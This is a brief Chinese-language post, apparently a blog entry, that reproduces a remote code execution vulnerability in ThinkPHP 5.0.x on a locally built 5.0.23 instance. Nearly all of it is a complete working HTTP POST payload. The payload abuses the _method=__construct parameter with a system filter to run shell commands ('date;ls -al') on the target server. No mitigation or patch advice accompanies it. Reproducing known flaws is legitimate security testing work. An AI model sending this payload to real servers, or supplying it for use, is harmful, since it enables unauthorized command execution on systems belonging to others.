ThinkPHP 5.0.* 远程代码执行漏洞

以5.0.23搭建环境。
payload如下:

POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1
Host: 192.168.170.186
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=date;ls -al

你可能感兴趣的:(Web)